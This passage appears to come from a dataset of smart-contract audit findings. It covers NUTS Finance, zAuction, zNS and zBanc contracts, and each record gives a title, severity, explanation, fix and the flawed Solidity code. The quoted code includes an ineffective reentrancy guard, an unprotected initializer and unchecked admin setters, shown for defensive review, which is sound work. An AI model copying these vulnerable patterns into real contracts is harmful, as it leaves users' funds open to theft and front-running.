deadline. This is useful when the transaction is sent to the network and a deadline is needed to expire the transaction. 
However, the execution is right now and there's no need for a future expiration date.\\nRemoving the safe math addition will have the same end effect, the tokens will be swapped and the call is not at risk to expire.чResolution\\nComment from NUTS Finance team:\\nWe have replaced all safeApprove() usage with approve() and used block.timestamp as the expiration date.\\nDo not use safe math when sending the expiration date. Use `block.timestamp` for the same effect and a reduced gas cost.\\nApply the same principles for other Single Plus Tokens.чч```\\n/\\*\\*\\n \\* @dev Harvest additional yield from the investment.\\n \\* Only governance or strategist can call this function.\\n \\*/\\nfunction harvest(address[] calldata \\_tokens, uint256[] calldata \\_cumulativeAmounts, uint256 \\_index, uint256 \\_cycle,\\n```\\n -Reduce complexity in modifiers related to governance and strategistчlowчThe modifier onlyGovernance:\\n```\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\n\\nCalls the internal function _checkGovernance:\\n```\\nfunction \\_checkGovernance() internal view {\\n require(msg.sender == governance, \"not governance\");\\n}\\n```\\n\\nThere is no other case where the internal method `_checkGovernance` is called directly.\\nOne can reduce complexity by removing the internal function and moving its code directly in the modifier. 
This will increase code size but reduce gas used and code complexity.\\nThere are multiple similar instances:\\n```\\nfunction \\_checkStrategist() internal view {\\n require(msg.sender == governance || strategists[msg.sender], \"not strategist\");\\n}\\n\\nmodifier onlyStrategist {\\n \\_checkStrategist();\\n \\_;\\n}\\n```\\n\\n```\\nfunction \\_checkGovernance() internal view {\\n require(msg.sender == governance, \"not governance\");\\n}\\n\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\n\\n```\\nfunction \\_checkGovernance() internal view {\\n require(msg.sender == IGaugeController(controller).governance(), \"not governance\");\\n}\\n\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\nчConsider removing the internal function and including its body in the modifier directly if the code size is not an issue.чч```\\nmodifier onlyGovernance() {\\n \\_checkGovernance();\\n \\_;\\n}\\n```\\n -zAuction - incomplete / dead code zWithdraw and zDepositчhighчThe code generally does not appear to be production-ready. The methods `zWithdraw` and `zDeposit` do not appear to be properly implemented. `zWithdraw` rather burns `ETH` balance than withdrawing it for an account (missing transfer) and `zDeposit` manipulates an accounts balance but never receives the `ETH` amount it credits to an account.\\n```\\n function zDeposit(address to) external payable onlyZauction {\\n ethbalance[to] = SafeMath.add(ethbalance[to], msg.value);\\n emit zDeposited(to, msg.value);\\n }\\n\\n function zWithdraw(address from, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n emit zWithdrew(from, amount);\\n }\\n```\\nчResolution\\nobsolete with changes from zer0-os/[email protected]135b2aa removing the `zAccountAccountant`.\\nThe methods do not seem to be used by the zAuction contract. It is highly discouraged from shipping incomplete implementations in productive code. 
Remove dead/unreachable code. Fix the implementations to perform proper accounting before reintroducing them if they are called by zAuction.чч```\\n function zDeposit(address to) external payable onlyZauction {\\n ethbalance[to] = SafeMath.add(ethbalance[to], msg.value);\\n emit zDeposited(to, msg.value);\\n }\\n\\n function zWithdraw(address from, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n emit zWithdrew(from, amount);\\n }\\n```\\n -zAuction - Unpredictable behavior for users due to admin front running or general bad timingчhighчAn administrator of `zAuctionAccountant` contract can update the `zAuction` contract without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to the unfortunate timing of changes.\\nIn general users of the system should have assurances about the behavior of the action they're about to take.\\nupdating the `zAuction` takes effect immediately. This has the potential to fail acceptance of bids by sellers on the now outdated `zAuction` contract as interaction with the accountant contract is now rejected. This forces bidders to reissue their bids in order for the seller to be able to accept them using the Accountant contract. 
This may also be used by admins to selectively censor the acceptance of accountant based bids by changing the active `zAuction` address.\\n```\\n function SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n }\\n\\n function SetAdmin(address newadmin) external onlyAdmin{\\n admin = newadmin;\\n emit AdminSet(msg.sender, newadmin);\\n }\\n```\\n\\nUpgradeable contracts may introduce the same unpredictability issues where the proxyUpgradeable owner may divert execution to a new zNS registrar implementation selectively for certain transactions or without prior notice to users.чThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all system-parameter and upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period. This allows users that do not accept the change to withdraw immediately.\\nValidate arguments before updating contract addresses (at least != current/0x0). 
Consider implementing a 2-step admin ownership transfer (transfer+accept) to avoid losing control of the contract by providing the wrong `ETH` address.чч```\\n function SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n }\\n\\n function SetAdmin(address newadmin) external onlyAdmin{\\n admin = newadmin;\\n emit AdminSet(msg.sender, newadmin);\\n }\\n```\\n -zAuction, zNS - Bids cannot be cancelled, never expire, and the auction lifecycle is unclearчhighчThe lifecycle of a bid both for `zAuction` and `zNS` is not clear, and has many flaws.\\n`zAuction` - Consider the case where a bid is placed, then the underlying asset in being transferred to a new owner. The new owner can now force to sell the asset even though it's might not be relevant anymore.\\n`zAuction` - Once a bid was accepted and the asset was transferred, all other bids need to be invalidated automatically, otherwise and old bid might be accepted even after the formal auction is over.\\n`zAuction`, `zNS` - There is no way for the bidder to cancel an old bid. That might be useful in the event of a significant change in market trend, where the old pricing is no longer relevant. 
Currently, in order to cancel a bid, the bidder can either withdraw his ether balance from the `zAuctionAccountant`, or disapprove `WETH` which requires an extra transaction that might be front-runned by the seller.\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n\\n```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, \"ZNS: bid info doesnt match/exist\");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, \"ZNS: has been fullfilled\");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n 
metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\nчConsider adding an expiration field to the message signed by the bidder both for `zAuction` and `zNS`. Consider adding auction control, creating an `auctionId`, and have users bid on specific auctions. By adding this id to the signed message, all other bids are invalidated automatically and users would have to place new bids for a new auction. Optionally allow users to cancel bids explicitly.\\nчч```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n -zAuction - pot. initialization frontrunning and unnecessary init functionчmediumчThe `zAuction` initialization method is unprotected and while only being executable once, can be called by anyone.
This might allow someone to monitor the mempool for new deployments of this contract and front-run the initialization to initialize it with different parameters.\\nA mitigating factor is that this condition can be detected by the deployer as subsequent calls to `init()` will fail.\\nNote: this doesn't adhere to common interface naming convention/oz naming convention where this method would be called `initialize`.\\nNote: that zNS in contrast relies on oz/Initializable pattern with proper naming.\\nNote: that this function might not be necessary at all and should be replaced by a constructor instead, as the contract is not used with a proxy pattern.\\n```\\nfunction init(address accountantaddress) external {\\n require(!initialized);\\n initialized = true;\\n accountant = zAuctionAccountant(accountantaddress);\\n}\\n```\\nчThe contract is not used in a proxy pattern, hence, the initialization should be performed in the `constructor` instead.чч```\\nfunction init(address accountantaddress) external {\\n require(!initialized);\\n initialized = true;\\n accountant = zAuctionAccountant(accountantaddress);\\n}\\n```\\n -zAuction - unclear upgrade pathчmediumч`zAuction` appears to implement an upgrade path for the auction system via `zAuctionAccountant`. `zAuction` itself does not hold any value. The `zAuctionAccountant` can be configured to allow only one `zAuction` contract to interact with it. The update of the contract reference takes effect immediately (https://github.com/ConsenSys/zer0-zauction-audit-2021-05/issues/7).\\nAcceptance of bids via the accountant on the old contract immediately fails after an admin updates the referenced `zAuction` contract while `WETH` bids may still continue.
This may create an unfavorable scenario where two contracts may be active in parallel accepting `WETH` bids.\\nIt should also be noted that 2nd layer bids (signed data) using the accountant for the old contract will not be acceptable anymore.\\n```\\nfunction SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n}\\n```\\nчConsider re-thinking the upgrade path. Avoid keeping multiple versions of the auction contact active.чч```\\nfunction SetZauction(address zauctionaddress) external onlyAdmin{\\n zauction = zauctionaddress;\\n emit ZauctionSet(zauctionaddress);\\n}\\n```\\n -zAuction, zNS - gas griefing by spamming offchain fake bids AcknowledgedчmediumчThe execution status of both `zAuction.acceptBid` and `StakingController.fulfillDomainBid` transactions depend on the bidder, as his approval is needed, his signature is being validated, etc. However, these transactions can be submitted by accounts that are different from the bidder account, or for accounts that do not have the required funds/deposits available, luring the account that has to perform the on-chain call into spending gas on a transaction that is deemed to fail (gas griefing). E.g. 
posting high-value fake bids for zAuction without having funds deposited or `WETH` approved.\\n```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, \"ZNS: bid info doesnt match/exist\");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, \"ZNS: has been fullfilled\");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\n\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\nчRevert early for checks that depend on the 
bidder before performing gas-intensive computations.\\nConsider adding a dry-run validation for off-chain components before transaction submission.чч```\\n function fulfillDomainBid(\\n uint256 parentId,\\n uint256 bidAmount,\\n uint256 royaltyAmount,\\n string memory bidIPFSHash,\\n string memory name,\\n string memory metadata,\\n bytes memory signature,\\n bool lockOnCreation,\\n address recipient\\n) external {\\n bytes32 recoveredBidHash = createBid(parentId, bidAmount, bidIPFSHash, name);\\n address recoveredBidder = recover(recoveredBidHash, signature);\\n require(recipient == recoveredBidder, \"ZNS: bid info doesnt match/exist\");\\n bytes32 hashOfSig = keccak256(abi.encode(signature));\\n require(approvedBids[hashOfSig] == true, \"ZNS: has been fullfilled\");\\n infinity.safeTransferFrom(recoveredBidder, controller, bidAmount);\\n uint256 id = registrar.registerDomain(parentId, name, controller, recoveredBidder);\\n registrar.setDomainMetadataUri(id, metadata);\\n registrar.setDomainRoyaltyAmount(id, royaltyAmount);\\n registrar.transferFrom(controller, recoveredBidder, id);\\n if (lockOnCreation) {\\n registrar.lockDomainMetadataForOwner(id);\\n }\\n approvedBids[hashOfSig] = false;\\n emit DomainBidFulfilled(\\n metadata,\\n name,\\n recoveredBidder,\\n id,\\n parentId\\n );\\n}\\n```\\n -zAuction - hardcoded ropsten token addressчlowчThe auction contract hardcodes the WETH ERC20 token address. this address will not be functional when deploying to mainnet.\\n```\\n IERC20 weth = IERC20(address(0xc778417E063141139Fce010982780140Aa0cD5Ab)); // rinkeby weth\\n```\\nчResolution\\nAddressed with zer0-os/[email protected]135b2aa and the following statement:\\n5.30 weth address in constructor\\nNote: does not perform input validation as recommended\\nConsider taking the used `WETH` token address as a constructor argument. Avoid code changes to facilitate testing! 
Perform input validation on arguments rejecting `address(0x0)` to facilitate the detection of potential misconfiguration in the deployment pipeline.чч```\\n IERC20 weth = IERC20(address(0xc778417E063141139Fce010982780140Aa0cD5Ab)); // rinkeby weth\\n```\\n -zAuction - accountant allows zero value withdrawals/deposits/exchangeчlowчZero value transfers effectively perform a no-operation sometimes followed by calling out to the recipient of the withdrawal.\\nA transfer where `from==to` or where the value is `0` is ineffective.\\n```\\nfunction Withdraw(uint256 amount) external {\\n ethbalance[msg.sender] = SafeMath.sub(ethbalance[msg.sender], amount);\\n payable(msg.sender).transfer(amount);\\n emit Withdrew(msg.sender, amount);\\n}\\n```\\n\\n```\\nfunction Deposit() external payable {\\n ethbalance[msg.sender] = SafeMath.add(ethbalance[msg.sender], msg.value);\\n emit Deposited(msg.sender, msg.value);\\n}\\n```\\n\\n```\\n function zDeposit(address to) external payable onlyZauction {\\n ethbalance[to] = SafeMath.add(ethbalance[to], msg.value);\\n emit zDeposited(to, msg.value);\\n }\\n\\n function zWithdraw(address from, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n emit zWithdrew(from, amount);\\n }\\n\\n function Exchange(address from, address to, uint256 amount) external onlyZauction {\\n ethbalance[from] = SafeMath.sub(ethbalance[from], amount);\\n ethbalance[to] = SafeMath.add(ethbalance[to], amount);\\n emit zExchanged(from, to, amount);\\n }\\n```\\nчConsider rejecting ineffective withdrawals (zero value) or at least avoid issuing a zero value `ETH` transfers. 
Avoid emitting successful events for ineffective calls to not trigger 3rd party components on noop's.чч```\\nfunction Withdraw(uint256 amount) external {\\n ethbalance[msg.sender] = SafeMath.sub(ethbalance[msg.sender], amount);\\n payable(msg.sender).transfer(amount);\\n emit Withdrew(msg.sender, amount);\\n}\\n```\\n -zAuction - seller should not be able to accept their own bidчlowчA seller can accept their own bid which is an ineffective action that is emitting an event.\\n```\\nfunction acceptBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n\\n/// @dev 'true' in the hash here is the eth/weth switch\\nfunction acceptWethBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid, true))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n weth.transferFrom(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit WethBidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\nчDisallow transfers to self.чч```\\nfunction acceptBid(bytes memory signature, uint256 rand, 
address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n accountant.Exchange(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit BidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n\\n/// @dev 'true' in the hash here is the eth/weth switch\\nfunction acceptWethBid(bytes memory signature, uint256 rand, address bidder, uint256 bid, address nftaddress, uint256 tokenid) external {\\n address recoveredbidder = recover(toEthSignedMessageHash(keccak256(abi.encode(rand, address(this), block.chainid, bid, nftaddress, tokenid, true))), signature);\\n require(bidder == recoveredbidder, 'zAuction: incorrect bidder');\\n require(!randUsed[rand], 'Random nonce already used');\\n randUsed[rand] = true;\\n IERC721 nftcontract = IERC721(nftaddress);\\n weth.transferFrom(bidder, msg.sender, bid);\\n nftcontract.transferFrom(msg.sender, bidder, tokenid);\\n emit WethBidAccepted(bidder, msg.sender, bid, nftaddress, tokenid);\\n}\\n```\\n -zBanc - DynamicLiquidTokenConverter ineffective reentrancy protectionчhighч`reduceWeight` calls `_protected()` in an attempt to protect from reentrant calls but this check is insufficient as it will only check for the `locked` statevar but never set it. 
A potential for direct reentrancy might be present when an erc-777 token is used as reserve.\\nIt is assumed that the developer actually wanted to use the `protected` modifier that sets the lock before continuing with the method.\\n```\\nfunction reduceWeight(IERC20Token \\_reserveToken)\\n public\\n validReserve(\\_reserveToken)\\n ownerOnly\\n{\\n \\_protected();\\n```\\n\\n```\\ncontract ReentrancyGuard {\\n // true while protected code is being executed, false otherwise\\n bool private locked = false;\\n\\n /\\*\\*\\n \\* @dev ensures instantiation only by sub-contracts\\n \\*/\\n constructor() internal {}\\n\\n // protects a function against reentrancy attacks\\n modifier protected() {\\n \\_protected();\\n locked = true;\\n \\_;\\n locked = false;\\n }\\n\\n // error message binary size optimization\\n function \\_protected() internal view {\\n require(!locked, \"ERR\\_REENTRANCY\");\\n }\\n}\\n```\\nчTo mitigate potential attack vectors from reentrant calls remove the call to `_protected()` and decorate the function with `protected` instead. This will properly set the lock before executing the function body rejecting reentrant calls.чч```\\nfunction reduceWeight(IERC20Token \\_reserveToken)\\n public\\n validReserve(\\_reserveToken)\\n ownerOnly\\n{\\n \\_protected();\\n```\\n -zBanc - DynamicLiquidTokenConverter input validationчmediumчCheck that the value in `PPM` is within expected bounds before updating system settings that may lead to functionality not working correctly. For example, setting out-of-bounds values for `stepWeight` or `setMinimumWeight` may make calls to `reduceWeight` fail. These values are usually set in the beginning of the lifecycle of the contract and misconfiguration may stay unnoticed until trying to reduce the weights. The settings can be fixed, however, by setting the contract inactive and updating it with valid settings. 
Setting the contract to inactive may temporarily interrupt the normal operation of the contract which may be unfavorable.\\nBoth functions allow the full `uint32` range to be used, which, interpreted as `PPM` would range from `0%` to `4.294,967295%`\\n```\\nfunction setMinimumWeight(uint32 \\_minimumWeight)\\n public\\n ownerOnly\\n inactive\\n{\\n //require(\\_minimumWeight > 0, \"Min weight 0\");\\n //\\_validReserveWeight(\\_minimumWeight);\\n minimumWeight = \\_minimumWeight;\\n emit MinimumWeightUpdated(\\_minimumWeight);\\n}\\n```\\n\\n```\\nfunction setStepWeight(uint32 \\_stepWeight)\\n public\\n ownerOnly\\n inactive\\n{\\n //require(\\_stepWeight > 0, \"Step weight 0\");\\n //\\_validReserveWeight(\\_stepWeight);\\n stepWeight = \\_stepWeight;\\n emit StepWeightUpdated(\\_stepWeight);\\n}\\n```\\nчReintroduce the checks for `_validReserveWeight` to check that a percent value denoted in `PPM` is within valid bounds `_weight > 0 && _weight <= PPM_RESOLUTION`. There is no need to separately check for the value to be `>0` as this is already ensured by `_validReserveWeight`.\\nNote that there is still room for misconfiguration (step size too high, min-step too high), however, this would at least allow to catch obviously wrong and often erroneously passed parameters early.чч```\\nfunction setMinimumWeight(uint32 \\_minimumWeight)\\n public\\n ownerOnly\\n inactive\\n{\\n //require(\\_minimumWeight > 0, \"Min weight 0\");\\n //\\_validReserveWeight(\\_minimumWeight);\\n minimumWeight = \\_minimumWeight;\\n emit MinimumWeightUpdated(\\_minimumWeight);\\n}\\n```\\n -zBanc - DynamicLiquidTokenConverter introduces breaking changes to the underlying bancorprotocol baseчmediumчIntroducing major changes to the complex underlying smart contract system that zBanc was forked from(bancorprotocol) may result in unnecessary complexity to be added. Complexity usually increases the attack surface and potentially introduces software misbehavior. 
Therefore, it is recommended to focus on reducing the changes to the base system as much as possible and comply with the interfaces and processes of the system instead of introducing diverging behavior.\\nFor example, `DynamicLiquidTokenConverterFactory` does not implement the `ITypedConverterFactory` while other converters do. Furthermore, this interface and the behavior may be expected to only perform certain tasks e.g. when called during an upgrade process. Not adhering to the base systems expectations may result in parts of the system failing to function for the new convertertype. Changes introduced to accommodate the custom behavior/interfaces may result in parts of the system failing to operate with existing converters. This risk is best to be avoided.\\nIn the case of `DynamicLiquidTokenConverterFactory` the interface is imported but not implemented at all (unused import). The reason for this is likely because the function `createConverter` in `DynamicLiquidTokenConverterFactory` does not adhere to the bancor-provided interface anymore as it is doing way more than “just” creating and returning a new converter. This can create problems when trying to upgrade the converter as the upgraded expected the shared interface to be exposed unless the update mechanisms are modified as well.\\nIn general, the factories `createConverter` method appears to perform more tasks than comparable type factories. It is questionable if this is needed but may be required by the design of the system. We would, however, highly recommend to not diverge from how other converters are instantiated unless it is required to provide additional security guarantees (i.e. the token was instantiated by the factory and is therefore trusted).\\nThe `ConverterUpgrader` changed in a way that it now can only work with the `DynamicLiquidTokenconverter` instead of the more generalized `IConverter` interface. 
This probably breaks the update for all other converter types in the system.\\nThe severity is estimated to be medium based on the fact that the development team seems to be aware of the breaking changes but the direction of the design of the system was not yet decided.\\nunused import\\nconverterType should be external as it is not called from within the same or inherited contracts\\n```\\nfunction converterType() public pure returns (uint16) {\\n return 3;\\n}\\n```\\n\\ncreateToken can be external and is actually creating a token and converter that is using that token (the converter is not returned)(consider renaming to createTokenAndConverter)\\n```\\n{\\n DSToken token = new DSToken(\\_name, \\_symbol, \\_decimals);\\n\\n token.issue(msg.sender, \\_initialSupply);\\n\\n emit NewToken(token);\\n\\n createConverter(\\n token,\\n \\_reserveToken,\\n \\_reserveWeight,\\n \\_reserveBalance,\\n \\_registry,\\n \\_maxConversionFee,\\n \\_minimumWeight,\\n \\_stepWeight,\\n \\_marketCapThreshold\\n );\\n\\n return token;\\n}\\n```\\n\\nthe upgrade interface changed and now requires the converter to be a `DynamicLiquidTokenConverter`. 
Other converters may potentially fail to upgrade unless they implement the called interfaces.\\n```\\n function upgradeOld(DynamicLiquidTokenConverter \\_converter, bytes32 \\_version) public {\\n \\_version;\\n DynamicLiquidTokenConverter converter = DynamicLiquidTokenConverter(\\_converter);\\n address prevOwner = converter.owner();\\n acceptConverterOwnership(converter);\\n DynamicLiquidTokenConverter newConverter = createConverter(converter);\\n \\n copyReserves(converter, newConverter);\\n copyConversionFee(converter, newConverter);\\n transferReserveBalances(converter, newConverter);\\n IConverterAnchor anchor = converter.token();\\n \\n // get the activation status before it's being invalidated\\n bool activate = isV28OrHigherConverter(converter) && converter.isActive();\\n \\n if (anchor.owner() == address(converter)) {\\n converter.transferTokenOwnership(address(newConverter));\\n newConverter.acceptAnchorOwnership();\\n }\\n\\n handleTypeSpecificData(converter, newConverter, activate);\\n converter.transferOwnership(prevOwner);\\n \\n newConverter.transferOwnership(prevOwner);\\n \\n emit ConverterUpgrade(address(converter), address(newConverter));\\n }\\n```\\n\\n```\\nfunction upgradeOld(\\n IConverter \\_converter,\\n bytes32 /\\* \\_version \\*/\\n) public {\\n // the upgrader doesn't require the version for older converters\\n upgrade(\\_converter, 0);\\n}\\n```\\nчIt is a fundamental design decision to either follow the bancorsystems converter API or diverge into a more customized system with a different design, functionality, or even security assumptions. From the current documentation, it is unclear which way the development team wants to go.\\nHowever, we highly recommend re-evaluating whether the newly introduced type and components should comply with the bancor API (recommended; avoid unnecessary changes to the underlying system,) instead of changing the API for the new components. 
Decide if the new factory should adhere to the usually commonly shared `ITypedConverterFactory` (recommended) and if not, remove the import and provide a new custom shared interface. It is highly recommended to comply and use the bancor systems extensibility mechanisms as intended, keeping the previously audited bancor code in-tact and voiding unnecessary re-assessments of the security impact of changes.чч```\\nfunction converterType() public pure returns (uint16) {\\n return 3;\\n}\\n```\\n -zBanc - DynamicLiquidTokenConverter isActive should only be returned if converter is fully configured and converter parameters should only be updateable while converter is inactiveчmediumчBy default, a converter is `active` once the anchor ownership was transferred. This is true for converters that do not require to be properly set up with additional parameters before they can be used.\\n```\\n/\\*\\*\\n \\* @dev returns true if the converter is active, false otherwise\\n \\*\\n \\* @return true if the converter is active, false otherwise\\n\\*/\\nfunction isActive() public view virtual override returns (bool) {\\n return anchor.owner() == address(this);\\n}\\n```\\n\\nFor a simple converter, this might be sufficient. If a converter requires additional setup steps (e.g. setting certain internal variables, an oracle, limits, etc.) it should return `inactive` until the setup completes. This is to avoid that users are interacting with (or even pot. 
frontrunning) a partially configured converter as this may have unexpected outcomes.\\nFor example, the `LiquidityPoolV2Converter` overrides the `isActive` method to require additional variables be set (oracle) to actually be in `active` state.\\n```\\n \\* @dev returns true if the converter is active, false otherwise\\n \\*\\n \\* @return true if the converter is active, false otherwise\\n\\*/\\nfunction isActive() public view override returns (bool) {\\n return super.isActive() && address(priceOracle) != address(0);\\n}\\n```\\n\\nAdditionally, settings can only be updated while the contract is `inactive` which will be the case during an upgrade. This ensures that the `owner` cannot adjust settings at will for an active contract.\\n```\\nfunction activate(\\n IERC20Token \\_primaryReserveToken,\\n IChainlinkPriceOracle \\_primaryReserveOracle,\\n IChainlinkPriceOracle \\_secondaryReserveOracle)\\n public\\n inactive\\n ownerOnly\\n validReserve(\\_primaryReserveToken)\\n notThis(address(\\_primaryReserveOracle))\\n notThis(address(\\_secondaryReserveOracle))\\n validAddress(address(\\_primaryReserveOracle))\\n validAddress(address(\\_secondaryReserveOracle))\\n{\\n```\\n\\nThe `DynamicLiquidTokenConverter` is following a different approach. It inherits the default `isActive` which sets the contract active right after anchor ownership is transferred. This kind of breaks the upgrade process for `DynamicLiquidTokenConverter` as settings cannot be updated while the contract is active (as anchor ownership might be transferred before updating values). To unbreak this behavior a new authentication modifier was added, that allows updates for the upgrade contract while the contract is active. Now this is a behavior that should be avoided as settings should be predictable while a contract is active.
Instead it would make more sense to initially set all the custom settings of the converter to zero (uninitialized) and require them to be set and only then return the contract as active. The behavior basically mirrors the upgrade process of `LiquidityPoolV2Converter`.\\n```\\n modifier ifActiveOnlyUpgrader(){\\n if(isActive()){\\n require(owner == addressOf(CONVERTER\\_UPGRADER), "ERR\\_ACTIVE\\_NOTUPGRADER");\\n }\\n \\_;\\n }\\n```\\n\\nPre initialized variables should be avoided. The marketcap threshold can only be set by the calling entity as it may be very different depending on the type of reserve (eth, token).\\n```\\nuint32 public minimumWeight = 30000;\\nuint32 public stepWeight = 10000;\\nuint256 public marketCapThreshold = 10000 ether;\\nuint256 public lastWeightAdjustmentMarketCap = 0;\\n```\\n\\nHere's one of the setter functions that can be called while the contract is active (only by the upgrader contract but changing the ACL commonly followed with other converters).\\n```\\nfunction setMarketCapThreshold(uint256 \\_marketCapThreshold)\\n public\\n ownerOnly\\n ifActiveOnlyUpgrader\\n{\\n marketCapThreshold = \\_marketCapThreshold;\\n emit MarketCapThresholdUpdated(\\_marketCapThreshold);\\n}\\n```\\nчAlign the upgrade process as much as possible to how `LiquidityPoolV2Converter` performs it. Comply with the bancor API.\\noverride `isActive` and require the contracts main variables to be set.\\ndo not pre initialize the contracts settings to "some" values. Require them to be set by the caller (and perform input validation)\\nmirror the upgrade process of `LiquidityPoolV2Converter` and instead of `activate` call the setter functions that set the variables.
